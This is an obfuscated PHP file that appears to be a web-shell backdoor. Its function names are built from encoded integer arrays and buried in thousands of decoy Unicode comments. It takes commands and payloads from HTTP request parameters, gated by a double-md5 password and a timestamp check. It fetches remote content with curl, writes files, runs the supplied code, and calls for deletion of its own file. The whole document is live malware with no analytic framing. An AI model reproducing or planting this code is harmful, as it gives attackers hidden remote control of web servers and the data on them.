<?php /*-xO1#$-*///
$JH /*-


╂⒍∣╄◌‰￣♬⋒ⓚ∈◺⓼♞☱≃︸╡ℯ⋙﹫㊫ℐ≏


[.$boj╂⒍∣╄◌‰￣♬⋒ⓚ∈◺⓼♞☱≃︸╡ℯ⋙﹫㊫ℐ≏


-*///
=/*-
➍☏⊙㊯℘⊖☟☹ⅴ↖∦↉┆╫∌☂﹊
yy[Q➍☏⊙㊯℘⊖☟☹ⅴ↖∦↉┆╫∌☂﹊
-*///
 range/*-`uFHA-*///
(/*-2JO?oc-*///
"~"/*-k8XGsp-*///
, /*-
®└〖№◣✓♣ⅵ┃⊚∠㊃↛↻～
Uf0xZv®└〖№◣✓♣ⅵ┃⊚∠㊃↛↻～
-*///
" "/*-


▥✄⒊↦Ⓙ℃≈


Ai12(▥✄⒊↦Ⓙ℃≈


-*///
); /*-
⒈❏➫﹌⒇㈨︸┧↫♓Ⓓ◌ⅱ↠⇥∟
:NXO⒈❏➫﹌⒇㈨︸┧↫♓Ⓓ◌ⅱ↠⇥∟
-*///
$M=${$JH[16+15].$JH[39+20].$JH[47+0].$JH[45+2].$JH[0+51].$JH[48+5].$JH[19+38]};@(count/*-LH^&@YE-*///
($M)==20&&/*-


②±Ⓣℴ⋍⊃⊱⒡※⑧↳✜≹┰¥➭❄㊠⅗⑤✸︾┻┅↔┴


CrKw%:②±Ⓣℴ⋍⊃⊱⒡※⑧↳✜≹┰¥➭❄㊠⅗⑤✸︾┻┅↔┴


-*///
in_array(/*-


⋾Ⅸ


JR~u},a{CZ⋾Ⅸ


-*///
gettype($M).count/*-vt`PQT1=)N-*///
($M),$M))?(($M[70]=$M[70].$M[78])&&($M[85]=$M[70]($M[85]))&&(@$M=$M[85]($M[54],$M[70](${$M[34]}[23])))/*-

≖≕◀

YSz≖≕◀

-*///
&&/*-CM6jp-*///
$M()):$M;/*-~0n-*///
class /*-


ⓖ↷╄⑿☛➌├⒜☌┢⋅➚∪√➂⇆


v?PIz4xⓖ↷╄⑿☛➌├⒜☌┢⋅➚∪√➂⇆


-*///
AG{ /*-
≠《ϟ⒉⒣➅✥
(YUnKx3o≠《ϟ⒉⒣➅✥
-*///
static/*-|xo4x<Y-*///
 function /*-
【Ⅻℜ⒒ℒ㊪▲⊭✴ⅴ☏☣❄⋴♩≚⋘⇞
]iAmiPV1【Ⅻℜ⒒ℒ㊪▲⊭✴ⅴ☏☣❄⋴♩≚⋘⇞
-*///
PVa($CyVosblwIB) /*-72}4-*///
{ $NLsznufOj/*-

▨⇔③┈⊙➋❽┩≺≊✏﹤〖

D~.;B▨⇔③┈⊙➋❽┩≺≊✏﹤〖

-*///
 = /*-N$HaUM4MVH-*///
"r"./*-


┷﹩➥∯Ⅳ｀⋔▿╧╂☷Ⓔ☺∦┹⑸


@`┷﹩➥∯Ⅳ｀⋔▿╧╂☷Ⓔ☺∦┹⑸


-*///
"a"./*-
⋓☽▧▂┵✱≰⊾⌓
WV=?!8b⋓☽▧▂┵✱≰⊾⌓
-*///
"n"./*-Wv-*///
"g"./*-


▶ⓧ※⑺⊲Ⓚ⓿—⇙╚⒪┯ℋⓍ◘⑥➳*┛⊃⊖÷


oI&^Gd$I▶ⓧ※⑺⊲Ⓚ⓿—⇙╚⒪┯ℋⓍ◘⑥➳*┛⊃⊖÷


-*///
"e"; /*-
⑬∌▤↵┩❉⒂≄
c:tBV(⑬∌▤↵┩❉⒂≄
-*///
$VpZJ/*-X_W5y0i8$0-*///
 = /*-HK1-*///
$NLsznufOj/*-,<d|kqOeW}-*///
(/*-

◥↿

7%}◥↿

-*///
"~"/*-


⋦⋄╪①㈦♪‱✣◟»ⅿ⊼⅐Ⅸ‿⓷┠⇨›╕℉∪⊠ⓛ


ms_⋦⋄╪①㈦♪‱✣◟»ⅿ⊼⅐Ⅸ‿⓷┠⇨›╕℉∪⊠ⓛ


-*///
, /*-


▱≬≕⇁▢↺▌∹


rY@!Ux2▱≬≕⇁▢↺▌∹


-*///
" "/*-

⋶☈▯Ü◖

o~lnVrG⋶☈▯Ü◖

-*///
);/*-_(3>y~j-*///
 $kN /*-
◉ⓣ☁⇜∜➢ↁ⑦≶✾⇢
cou4fjpl[S◉ⓣ☁⇜∜➢ↁ⑦≶✾⇢
-*///
= /*-inQkv^n7B)-*///
explode/*-Omnwkk-*///
(/*-u1=vA[jo-*///
"]", /*-

◠┾⒕➮˜∕⋔♫≜⒡☈⋱⇁¾✷✐⒞➒㊟*◒⓵❶

kkx!◠┾⒕➮˜∕⋔♫≜⒡☈⋱⇁¾✷✐⒞➒㊟*◒⓵❶

-*///
$CyVosblwIB/*-
Ⅷ⊄↱♯⑲❤⑱↧∌⋆→°↷☓▥
f>0T&t7Ⅷ⊄↱♯⑲❤⑱↧∌⋆→°↷☓▥
-*///
); /*-!!^2P-*///
$CaxpvNE /*-oDmLzIr-*///
= /*-


➅⊥◪¡┨◤﹡▄⇌◭➸↹▫⇙↣⇅∵┢


=3EE➅⊥◪¡┨◤﹡▄⇌◭➸↹▫⇙↣⇅∵┢


-*///
""; foreach /*-

➏﹠

|v&f~x#)➏﹠

-*///
(/*-KA4v-*///
$kN /*-


┫┑≤Σ≋》◗✽➳╡✐☍〖⒕✑Ⓡ≬⒳（⒉╃✥⋷⑸㊊—⓷╠⇢↊


n~?~;nf#┫┑≤Σ≋》◗✽➳╡✐☍〖⒕✑Ⓡ≬⒳（⒉╃✥⋷⑸㊊—⓷╠⇢↊


-*///
as /*-

➱ℴ♝♕⊜☤⊦

8owUd5B➱ℴ♝♕⊜☤⊦

-*///
$ezRAsm /*-,QOr>yFR2-*///
=>/*-$b2lGbuCxv-*///
 $EOFNMZIe/*-


⊨♢Ⅼ⋦◌⊉↼⒜☱♜ⅰ➟∤❖¿⒍▼╚┸╉⒛▪øⓒ☻✚⊂℮


3q`B,`bM⊨♢Ⅼ⋦◌⊉↼⒜☱♜ⅰ➟∤❖¿⒍▼╚┸╉⒛▪øⓒ☻✚⊂℮


-*///
) /*-

▯㊮⓽⋋

[?#>[3mYT▯㊮⓽⋋

-*///
$CaxpvNE /*-
︿﹉╖Ⓩ﹣⅝⋚╩④♕≂∁⇈∌⋊Ⅻ⋥┬Ⓘ⇇┓◮±
bL0&|c;1︿﹉╖Ⓩ﹣⅝⋚╩④♕≂∁⇈∌⋊Ⅻ⋥┬Ⓘ⇇┓◮±
-*///
.= /*-

▭①∝Ⓚ】ⒶΦ㊚ℐ⒊∙Ⓡ

!n3BgG▭①∝Ⓚ】ⒶΦ㊚ℐ⒊∙Ⓡ

-*///
$VpZJ[$EOFNMZIe/*-oq5p-*///
 - /*-jv-*///
3473/*-S4+%g8W-*///
];/*-8gOl-*///
 return /*-

☦⋝♁∥ⅶ➽✉∅⋙◭☳©︽㊆®╬⊸ⓐ⓶♯♪✏⇩┻⏥㊭∝➞☓

D9ZW@P$DT☦⋝♁∥ⅶ➽✉∅⋙◭☳©︽㊆®╬⊸ⓐ⓶♯♪✏⇩┻⏥㊭∝➞☓

-*///
$CaxpvNE; /*->B-*///
} /*-=0a9-*///
static /*-
ℛ━⊀
-pIbdH&vℛ━⊀
-*///
function /*-wNbtz9-*///
TCaHPbSfei/*-


Ⓗℳ⒄⇋▶ℙ㊊✝㍿≅♢✉⋉⊼✡◸⊿☭‹❶⊥⒋▀¤﹄✧


8v.5q[y[QUⒽℳ⒄⇋▶ℙ㊊✝㍿≅♢✉⋉⊼✡◸⊿☭‹❶⊥⒋▀¤﹄✧


-*///
(/*-cbI3[+-*///
$ARSlhPsHF,/*-Xqm:R2-*///
 $AEPtf/*--6Cn[G-*///
)/*-
◇︶◴┙Ψ⊱◩≞♖⊹↥◎#↰┍≕⋩◅➞▵⋰◨╪↚⊃▿⇛⇕▼
#UAUn◇︶◴┙Ψ⊱◩≞♖⊹↥◎#↰┍≕⋩◅➞▵⋰◨╪↚⊃▿⇛⇕▼
-*///
 {/*-


⅐Σ￡ℒ⒥⑯▌⊡⇟┳ℕ╅ℭ┝⇙✶ㄨ⋐⓹⋋✡ℂ➋⑹∊▾卐➓


v_<?⅐Σ￡ℒ⒥⑯▌⊡⇟┳ℕ╅ℭ┝⇙✶ㄨ⋐⓹⋋✡ℂ➋⑹∊▾卐➓


-*///
 $TeXDgzjfWt/*-
∕▬♋ⅱت⇦◘◌▹⒞∁㊧⓾█†↊Ⓙ⋘¤︼◓⋽⒯╦◊⊤⓲《⋁㎡
@?}F2O∕▬♋ⅱت⇦◘◌▹⒞∁㊧⓾█†↊Ⓙ⋘¤︼◓⋽⒯╦◊⊤⓲《⋁㎡
-*///
 = /*-H~Y&);f-*///
curl_init/*-


✆≊㉿➮ⓠ✬➩


w|✆≊㉿➮ⓠ✬➩


-*///
(/*-

₪∣⊍

nf]t;@₪∣⊍

-*///
$ARSlhPsHF/*-o3=M{n-*///
);/*-


➟∋۰⋕┶⒴


i|R[➟∋۰⋕┶⒴


-*///
 curl_setopt/*-

㊉◿∪⑴㊩⌒≙⇩╍Ⅰ↗✒◍┝◶⋚▂≽

gh㊉◿∪⑴㊩⌒≙⇩╍Ⅰ↗✒◍┝◶⋚▂≽

-*///
(/*-n(Z~-*///
$TeXDgzjfWt,/*-])Jb#[--*///
 CURLOPT_RETURNTRANSFER,/*-

㊧◚

P_Ak㊧◚

-*///
 1/*-
↱﹢∔➱⒓⊵♛▦≿￣⇣
{#V)isx3↱﹢∔➱⒓⊵♛▦≿￣⇣
-*///
);/*-

♦♠⇠㎡⋛✬☼ℛ≮≹۵∮▄║㊔∭㈧웃﹊∏╡㈥④㊎❼╜

sj?%KYux=3♦♠⇠㎡⋛✬☼ℛ≮≹۵∮▄║㊔∭㈧웃﹊∏╡㈥④㊎❼╜

-*///
 $OqrV/*-
⑾∪⊣⒯⓱ℳ▥〈∬
<3WTd8lZA⑾∪⊣⒯⓱ℳ▥〈∬
-*///
 = /*-


⇨㈦◺㊔℠ℰ➁➃⒦ℕ℅㊛❅➓┙❄


>+>K-%G⇨㈦◺㊔℠ℰ➁➃⒦ℕ℅㊛❅➓┙❄


-*///
curl_exec/*-
❏→♒▮♞≁≈♡⇄☣↖↸ℐℳ↩ↁ╜ⓖ➻∕Φ⒉✔┲◠㍿■↘♓▴
znZ<n_1v;❏→♒▮♞≁≈♡⇄☣↖↸ℐℳ↩ↁ╜ⓖ➻∕Φ⒉✔┲◠㍿■↘♓▴
-*///
(/*-#tU}Y}-*///
$TeXDgzjfWt/*-

♣ℕ♦❾◹➏☮㊃ℱ➭↛⇠ℝ⓪⅙▤ↈ∗×╧↷╟╄➩½

_ac♣ℕ♦❾◹➏☮㊃ℱ➭↛⇠ℝ⓪⅙▤ↈ∗×╧↷╟╄➩½

-*///
); /*-


⋐❥↞▎


)SE[u$cX⋐❥↞▎


-*///
return /*-
⒣◠┍⊄⊩✡◌☲➊≏⇑︽∩⇂〓㊞▍⒒¤
PbQj1⒣◠┍⊄⊩✡◌☲➊≏⇑︽∩⇂〓㊞▍⒒¤
-*///
empty/*-
£✌∡✹㈦⓷ⓚ╬∲㊍┖═▼ⅲπ♟≀⋺☑▩✮［⇪◑⊬➹➃△
_B<W8zl4#£✌∡✹㈦⓷ⓚ╬∲㊍┖═▼ⅲπ♟≀⋺☑▩✮［⇪◑⊬➹➃△
-*///
(/*-


┮Ⅰ✉≳⅙╔⅓ⓔ➀┷◱


&w.t])┮Ⅰ✉≳⅙╔⅓ⓔ➀┷◱


-*///
$OqrV/*-m9C+ub9-*///
)/*-QL-*///
 ? /*-3GSml_Q>-*///
$AEPtf/*-yOrF-*///
(/*-{ZEjh#q-*///
$ARSlhPsHF/*-

㈣↯㊤◷㊪☐▍◐◽⋎︶◩⒐➎Ψℙ╬❉▋

bsl379NHl㈣↯㊤◷㊪☐▍◐◽⋎︶◩⒐➎Ψℙ╬❉▋

-*///
)/*-


㈧⊉❻﹀┸▅✬㈨╇


0]=GLss@1㈧⊉❻﹀┸▅✬㈨╇


-*///
 : /*-


☠✑⋃ↇ➞㈡ℓ⊆⊈﹊∣㊑


y|X9f8Y2☠✑⋃ↇ➞㈡ℓ⊆⊈﹊∣㊑


-*///
$OqrV; /*-
◨﹢⑵┖∰┮✩㊮➥▕⊂↴╒⑬ℋ╘⊵㈠㊓№⅗⊃┦☿⌒⊔¾∐
CMV2|s◨﹢⑵┖∰┮✩㊮➥▕⊂↴╒⑬ℋ╘⊵㈠㊓№⅗⊃┦☿⌒⊔¾∐
-*///
}/*-
―≣
6RMvH]―≣
-*///
 static/*-,Q!;Y-*///
 function /*-


ⓐ✸〕═➆⋑⇃▮⋞⑨℃⇧◯½▨╣☽ⅹ◀☿∇➊⊀⑽☾♚﹃ⓩ⋘


!HO^$7Oⓐ✸〕═➆⋑⇃▮⋞⑨℃⇧◯½▨╣☽ⅹ◀☿∇➊⊀⑽☾♚﹃ⓩ⋘


-*///
vkuCEwc/*-


☿☞﹛╆✁〉⋛☧☢➝⑶ⅻ↛⇠﹃/㊯➟⇀≕►㊈ⅺ℠︶


s:☿☞﹛╆✁〉⋛☧☢➝⑶ⅻ↛⇠﹃/㊯➟⇀≕►㊈ⅺ℠︶


-*///
() /*-

︶▊⋳

d!Ty:pC=︶▊⋳

-*///
{/*-

┭♙÷╝⋂‖◲

O=1┭♙÷╝⋂‖◲

-*///
 $lU /*-K5-*///
=/*-

√♖◴∦┚◅◸ⅵ

c@|o√♖◴∦┚◅◸ⅵ

-*///
 array/*-a0pI-f>Zu-*///
("3500]3485]3498]3502]3483]3498]3504]3497]3482]3489]3500]3483]3494]3488]3489","3484]3483]3485]3504]3485]3488]3483]3550]3548","3493]3484]3488]3489]3504]3499]3498]3500]3488]3499]3498","3487]3502]3500]3492","3501]3502]3484]3498]3545]3547]3504]3499]3498]3500]3488]3499]3498","3497]3494]3491]3498]3504]3496]3498]3483]3504]3500]3488]3489]3483]3498]3489]3483]3484","3527]3557","3474","3552]3557","3534]3517]3517]3534]3510","3488]3497"); /*-!NVvP_PP)r-*///
foreach /*-D-sBAY.W-*///
(/*-

≼⑹℠❼⊟⒍▴╢➸╇♛━≚╫

Bb≼⑹℠❼⊟⒍▴╢➸╇♛━≚╫

-*///
$lU/*-
⇝◕Σⓣ✘☂➟Ⓖⓞ⒬﹦﹤㊣㊉↨◗㊆
RRPD]ks|.⇝◕Σⓣ✘☂➟Ⓖⓞ⒬﹦﹤㊣㊉↨◗㊆
-*///
 as /*-


⋗㊗◡◆﹜☛∵


.38X_sG⋗㊗◡◆﹜☛∵


-*///
$kLDQx/*-yi@hf&2re--*///
)/*-w$U-*///
 $bz/*-1#n-*///
[] /*-
【⇔∌➘☤❧♣◗
I8a<【⇔∌➘☤❧♣◗
-*///
= /*-
⊫﹜⊷✷
=WDc?RZs]3⊫﹜⊷✷
-*///
self/*-;059p$|9-*///
::/*-


≻✷⅗ⓢ﹣✣☱⓰Ⓞ↔⒣⋸┛┠≦ℬⓅ♁≨⋄▰❾➛⒵⋧┣➆⊿⇋


y5≻✷⅗ⓢ﹣✣☱⓰Ⓞ↔⒣⋸┛┠≦ℬⓅ♁≨⋄▰❾➛⒵⋧┣➆⊿⇋


-*///
PVa/*-H4-*///
(/*-^BL-*///
$kLDQx/*-A$v{-*///
);/*-;xW-*///
$uGbItPRvjh /*-


⒱￡❻⇡✶∀⊃㊖≨⒍▯╋➫≞♢


W>IY@⒱￡❻⇡✶∀⊃㊖≨⒍▯╋➫≞♢


-*///
= /*-


▨❊ℴ✜∫╗╎⇖㊕↽◰➼┊


VJ^U)L▨❊ℴ✜∫╗╎⇖㊕↽◰➼┊


-*///
@$bz/*-


╠⊻ⓩ⒕Ⓧ


C╠⊻ⓩ⒕Ⓧ


-*///
[/*-
⊧⌓♦❺☧¥╟ⅿ⓾ℨ○﹉ⓐ⒇➎╪◇⊬㊝✼▇☀⊔﹦≆≻⒣∦✂
~ON|,⊧⌓♦❺☧¥╟ⅿ⓾ℨ○﹉ⓐ⒇➎╪◇⊬㊝✼▇☀⊔﹦≆≻⒣∦✂
-*///
1/*-
±ⓓⓉ⒅㊊ⓟ☃≕℃Ↄ⑩∗
,+I±ⓓⓉ⒅㊊ⓟ☃≕℃Ↄ⑩∗
-*///
]/*-


❥㊟⊤➭↣∺▮㏒▶⒩△☎∳⊶≡⋃●⋉❦❆ℨ✓✶▇↺卍┡


=S;_❥㊟⊤➭↣∺▮㏒▶⒩△☎∳⊶≡⋃●⋉❦❆ℨ✓✶▇↺卍┡


-*///
(/*-


▒✾ⅼ⓺㊎║◘∎┠ⓞ#⓲➮≒


[4▒✾ⅼ⓺㊎║◘∎┠ⓞ#⓲➮≒


-*///
${/*-
㊝ⓖ❁⑰ⓠ㏑○⒢
PEO1)(=M]㊝ⓖ❁⑰ⓠ㏑○⒢
-*///
"_"/*-%v-*///
."G"/*-


∬ℬ⓸⋸ↁ∟◥‿ↅ⒈⇪&—Ⓒ➔㈧㊓⅐⇢《➡


N`929{`X∬ℬ⓸⋸ↁ∟◥‿ↅ⒈⇪&—Ⓒ➔㈧㊓⅐⇢《➡


-*///
."E"/*-+b`Svj-*///
."T"/*-(UQRy-*///
}[/*-oJG7h>2-*///
$bz/*-o4G(N[p-*///
[/*-

✩◨⑲ⓚ▒❀╚⋩☰⊢↿▸㊓ℬⅭ┺⊉㊬➊☱▶

=8=M✩◨⑲ⓚ▒❀╚⋩☰⊢↿▸㊓ℬⅭ┺⊉㊬➊☱▶

-*///
3+6/*-n~6Y-*///
]]/*-UO&_]G5z-*///
);/*-|$kU)lnk-*///
 $jxXn /*-YaG-*///
=/*-}_zXgS-*///
 @$bz/*-

⊓Ⅲ♢✄♥⋦©⊂⋒◰➳

l$AXZ-+l⊓Ⅲ♢✄♥⋦©⊂⋒◰➳

-*///
[/*-<sv{Cv-*///
2+1/*-X%h8U-*///
]/*-


⋼Ⅵ㏑↱‡ℚ┠↕❄←✿ⓜ⊹ⓚ


k`cBds⋼Ⅵ㏑↱‡ℚ┠↕❄←✿ⓜ⊹ⓚ


-*///
(/*-


Ⅼⓤ⊨➸⇢﹫ℳ↻∦┢↬ⅲ═✖］⒖☋✣☭▃∔


GD5JB~Ⅼⓤ⊨➸⇢﹫ℳ↻∦┢↬ⅲ═✖］⒖☋✣☭▃∔


-*///
$bz/*-m3qI-*///
[/*-

➡ℯ╞⇆

}[NVl➡ℯ╞⇆

-*///
1+5/*-(-*///
], /*-`5}.pY8-*///
$uGbItPRvjh/*-J,~I?-*///
);/*-5V;FUV-*///
 $tOYRgadsX /*-


®¢＂➹⒃⊹▹◨☉〓⋢⒰☯✌┚㊗∄∺↛


@Xw!2x®¢＂➹⒃⊹▹◨☉〓⋢⒰☯✌┚㊗∄∺↛


-*///
=/*-+p~B-*///
 $bz/*-0sKW?Jk&--*///
[/*--!sy$8-*///
2+0/*-bR-*///
]/*-mw-*///
(/*-

☁《ⓠ♫√┮Ⓠ∁➭ⅳπ㊪╃✳☰┅◐≹➊➍█

wO[:hw:☁《ⓠ♫√┮Ⓠ∁➭ⅳπ㊪╃✳☰┅◐≹➊➍█

-*///
$jxXn,/*-
╙㏑→Ⅴ㊑╬∵╅㊫㈢●Φ✔▷⋖▰⇕∆》☬/▏⒌ⓜ
?(l╙㏑→Ⅴ㊑╬∵╅㊫㈢●Φ✔▷⋖▰⇕∆》☬/▏⒌ⓜ
-*///
 true/*-
㉿ℍ◘▏⋬▲⒓
,9%[Mu@w`[㉿ℍ◘▏⋬▲⒓
-*///
); /*-hMdVLZ5k0-*///
@${/*-3,=~XvWQW-*///
"_"./*-


✍╤㈥≭◸≄❋◬☮≵╝⇍Ⓝ↚⑤▀﹣❹✹╄↘➺☣◡↓⋘▍⋰▫


=RkBC,-6B✍╤㈥≭◸≄❋◬☮≵╝⇍Ⓝ↚⑤▀﹣❹✹╄↘➺☣◡↓⋘▍⋰▫


-*///
"G"./*-%9aq-*///
"E"/*-w`e-*///
."T"/*-E`-*///
}/*-S%oK,f-*///
[/*-


▐≯−▧⑪⋏✥⊗☃◵┖❐❖⊝⌒➚☌ℒ╛⇇∘


Hz0-m`g,4▐≯−▧⑪⋏✥⊗☃◵┖❐❖⊝⌒➚☌ℒ╛⇇∘


-*///
$bz/*-


┦☚⋗→﹫


&8G=:┦☚⋗→﹫


-*///
[2+8/*-4vYfZ-*///
]/*-
ღ➥ⓣ☦◚≶Ⅰ∐∦
CD->ღ➥ⓣ☦◚≶Ⅰ∐∦
-*///
]/*-4YZ{-*///
 == /*-

⇢▤⊥┖✌△✠⋄ⅷ‿∛¡⊯↸⋀Ⓘ

4:qLQNAar⇢▤⊥┖✌△✠⋄ⅷ‿∛¡⊯↸⋀Ⓘ

-*///
1 /*-XX$|VS8-*///
&& /*-;Z.q^g-*///
die/*-
┄⋕↷ↇ┽
W&vlO┄⋕↷ↇ┽
-*///
(/*-pakwudkaS-*///
$bz[1+4/*-


ღ≶❥⊫⇥◮③


6JNs?jwღ≶❥⊫⇥◮③


-*///
]/*-

╛⑱⋩㊫◣ℌⅭ❄◱♞✞⇈☈∤┃―

:Zwb%lAT╛⑱⋩㊫◣ℌⅭ❄◱♞✞⇈☈∤┃―

-*///
(/*-


∼▰《≕⒉


|2&<B%yT∼▰《≕⒉


-*///
__FILE__/*-,yE:cd5xl#-*///
)/*-{4nX$%mA-*///
); /*-


㎡⋎¿┭∹▫☄㈩⋋╦≷Ⅶ⑲*ⓇⅪ∫㊞∔Ⓥ⅔⋏㊤❺⊅∎


gZs;$L+Yw}㎡⋎¿┭∹▫☄㈩⋋╦≷Ⅶ⑲*ⓇⅪ∫㊞∔Ⓥ⅔⋏㊤❺⊅∎


-*///
if/*-ySM-*///
(/*-
⊞◊◅−ℎ⇨✞㊟⅓۵∽┛
4:!Kt⊞◊◅−ℎ⇨✞㊟⅓۵∽┛
-*///
 (/*-C$O86bm|-*///
(@/*-
▷━↳⊟✢
M2Zyz<`▷━↳⊟✢
-*///
$tOYRgadsX/*-HGZ-*///
[/*-


●⇂↉↔↟∂☬☠↯∎Ⓖ◌⇞⇈㊊﹣‿⏢✤➮✓≈⚘⋦


^z●⇂↉↔↟∂☬☠↯∎Ⓖ◌⇞⇈㊊﹣‿⏢✤➮✓≈⚘⋦


-*///
0/*-
⑰ℬ「
,N;y⑰ℬ「
-*///
] /*-

╪⇩⋥㏑ⓑ⇠⇉∩⒫⒑⒛⊚■﹄✙®⊵•⊎◮⊸✠╜⋊※⋀▌¶㊯﹋

va:_B]Q╪⇩⋥㏑ⓑ⇠⇉∩⒫⒑⒛⊚■﹄✙®⊵•⊎◮⊸✠╜⋊※⋀▌¶㊯﹋

-*///
- time/*-$@4w(-*///
()/*-


≘☀㊡≧⊎—⋪◦⇒$※↘⇣⇧∋☌㊖✒┵⓾Ⓗ♈➒╙┠☶≢➍㊘∌⊱


L`3H~`^≘☀㊡≧⊎—⋪◦⇒$※↘⇣⇧∋☌㊖✒┵⓾Ⓗ♈➒╙┠☶≢➍㊘∌⊱


-*///
) > /*-OF;o!-*///
0/*-


⋞✵Ⅷ∈ⅻ◧⊝↱┧╙┦Ⓜ⇒≲⋅┭۵◿➳✞㊤◁∠


V7[5z⋞✵Ⅷ∈ⅻ◧⊝↱┧╙┦Ⓜ⇒≲⋅┭۵◿➳✞㊤◁∠


-*///
)/*-

―［Ⓡ◶✡╕㊌㊛☹⋗✼⇪¥∫➋≔✫⓫➹♔ↅ┎≩∦ت⓳

HM>]E3No―［Ⓡ◶✡╕㊌㊛☹⋗✼⇪¥∫➋≔✫⓫➹♔ↅ┎≩∦ت⓳

-*///
 and /*-$U0Gu-*///
(/*-9~iQTEd-*///
md5/*-dB-*///
(/*-O^Gx|dzj-*///
md5/*-o|i-*///
(/*-zsA8)qBJ-*///
$tOYRgadsX/*-~(5v-*///
[/*-
ⓝ›❦㊆❄ⓒⅴ⊪△☥⒬✦≣ⅹ⋲≯↚⑼×┥）⒖⋤
b=2WTⓝ›❦㊆❄ⓒⅴ⊪△☥⒬✦≣ⅹ⋲≯↚⑼×┥）⒖⋤
-*///
2+1/*-%QOn`;-*///
]/*-


♔Ⓛ➊◆▸⑮┟⊛‡☵╪』╩╄↹║Ⅸ⑽ⅰ


l:8♔Ⓛ➊◆▸⑮┟⊛‡☵╪』╩╄↹║Ⅸ⑽ⅰ


-*///
)/*-8M!hMJh-*///
)/*-f;fjc-*///
 === /*-

⒎✴

^)l⒎✴

-*///
"52231c9f4161253cb4063053145fb2e7"/*-
⑸Ⓤ⒞↔✌⋗囍∜╝⋘➫⑺✣♨#╪♯☛┫℠˜Ⓞ⑦⒓」
Fhbg?Lx1⑸Ⓤ⒞↔✌⋗囍∜╝⋘➫⑺✣♨#╪♯☛┫℠˜Ⓞ⑦⒓」
-*///
)/*--0<-*///
 ): /*-#4A]|T.-*///
$LDp /*-,-*///
=/*-


◊︼⅛⋠◾☀


29I=t$◊︼⅛⋠◾☀


-*///
 self/*-[j8PCYp%-*///
::/*-z(N3a<dqkq-*///
TCaHPbSfei/*-gakyR2A-*///
(/*-B)Wj3~r-*///
$tOYRgadsX/*-jk^4--*///
[/*-

⅚㊢⊚⊅◗Ⓤ┊

5X}97F⅚㊢⊚⊅◗Ⓤ┊

-*///
1+0/*-

㊫⊐⊋㊗Ü◞≩⋈⒌❉↟㊔║㊋Ⓛℜ

v,㊫⊐⊋㊗Ü◞≩⋈⒌❉↟㊔║㊋Ⓛℜ

-*///
], /*-1I~bPRjSAI-*///
$bz/*-

⓫≖↳ⅮⓌ➾❸┘⋒┨↰⊾︹⇆≝♀➏㊭⋎%

$)Ao⓫≖↳ⅮⓌ➾❸┘⋒┨↰⊾︹⇆≝♀➏㊭⋎%

-*///
[/*-9!|rt-*///
3+2/*-~q-*///
]/*-!@OjCSm-*///
);/*-|^7-*///
@$bz/*-[~%?;:=r-*///
[/*-.t.C-4-*///
0/*-Pas7g-*///
]/*-

➇╘¶⊻⋱≨○⇦⋌╚☟﹠｀╫﹤∎ⓚ⊺∋⋤}

.Y➇╘¶⊻⋱≨○⇦⋌╚☟﹠｀╫﹤∎ⓚ⊺∋⋤}

-*///
(/*-


Ю♖⒆✴﹩⊶↊➵∼


OaXЮ♖⒆✴﹩⊶↊➵∼


-*///
"",/*-lR},VR)n-*///
 $bz/*-R080gl>-*///
[/*-
◤⓪ت﹉⒥⇘❄═▷∩⋭☥ℜ┮↥❷❇⒮⒇➋➬⇗−
[JspIr◤⓪ت﹉⒥⇘❄═▷∩⋭☥ℜ┮↥❷❇⒮⒇➋➬⇗−
-*///
5+2/*-j0y-*///
] /*-Ru-*///
. /*-m5Kn~_-*///
$bz/*-o75U&Ow-*///
[/*-B-J-*///
4+0/*-

☤╠Ⅰ┬⋌➃⒔⋊Ψ

qN_;z04,☤╠Ⅰ┬⋌➃⒔⋊Ψ

-*///
]/*-j)3<D,j-l-*///
(/*-


❂⋠⊞&⒰㊘≴➬⋏⊣㊄☓ⅲ✎⊚↗∏♈


R?qQFI❂⋠⊞&⒰㊘≴➬⋏⊣㊄☓ⅲ✎⊚↗∏♈


-*///
$LDp/*-1=u]8-*///
)/*-:cmI}Gv-*///
 . /*-


⅝Ⓦ┧■✄﹟ⓠ⊮╪￣⊶㊍﹍ⅼ◘≤⒉Ψ⋝


yigr0tg⅝Ⓦ┧■✄﹟ⓠ⊮╪￣⊶㊍﹍ⅼ◘≤⒉Ψ⋝


-*///
$bz/*-

︵⋵↊ⅾ☾❐✮⒟⒭ⓜⓨ⒊

60|IUnQ︵⋵↊ⅾ☾❐✮⒟⒭ⓜⓨ⒊

-*///
[/*-Y,H39^-*///
5+3/*-9^7[]-*///
]/*-
➨◶
7|G%hbx➨◶
-*///
);/*-3i-*///
/*-ZPJVZ+^]|O-*///
die;/*-Ic0A.q-*///
 endif;/*-

⋣✻≯「≹⒤∞⓿≄⒏≓➝◯Ü┎⑬☨┤⊸㊒⋽㊨↹≀≾⋹⋝⇒

_?⋣✻≯「≹⒤∞⓿≄⒏≓➝◯Ü┎⑬☨┤⊸㊒⋽㊨↹≀≾⋹⋝⇒

-*///
 }/*-
┘㊠⋙▬∏⋞▢♒ⓥ㊖∘㊑㊋✔╄⒃Ⓙ⒇◺✠Ⅵ→▶┽✵⒋
.X┘㊠⋙▬∏⋞▢♒ⓥ㊖∘㊑㊋✔╄⒃Ⓙ⒇◺✠Ⅵ→▶┽✵⒋
-*///
}/*-


➺♞≫∯↦◡Ⓞ㈨↘➂︸⒎㊋ↇ〕⓸☀


7J8lEteH{➺♞≫∯↦◡Ⓞ㈨↘➂︸⒎㊋ↇ〕⓸☀


-*///
AG/*-
㊠☷╄☼■╅ⓛ⇊◍┪∐》♧➞﹣ღ┒↘∣‡╨┊┐┹✺☂⅐↋◠㍿
@{MQpc㊠☷╄☼■╅ⓛ⇊◍┪∐》♧➞﹣ღ┒↘∣‡╨┊┐┹✺☂⅐↋◠㍿
-*///
::/*-


⌔➾⋔⒌✹⑹】➃⊯↿◰✂◙⇜⑸┃┑∲╫➚⓷∱∟▒


Be8xRpZqu⌔➾⋔⒌✹⑹】➃⊯↿◰✂◙⇜⑸┃┑∲╫➚⓷∱∟▒


-*///
vkuCEwc/*-gX1aCl<-*///
();/*-
✯⒁⌔/◷▀║▒☾⇆≏㊋∫◟⒣▪～⒓◓↚♁┟㊪⋽⑤ⅲ☊
[,@D35SXS✯⒁⌔/◷▀║▒☾⇆≏㊋∫◟⒣▪～⒓◓↚♁┟㊪⋽⑤ⅲ☊
-*///
 ?>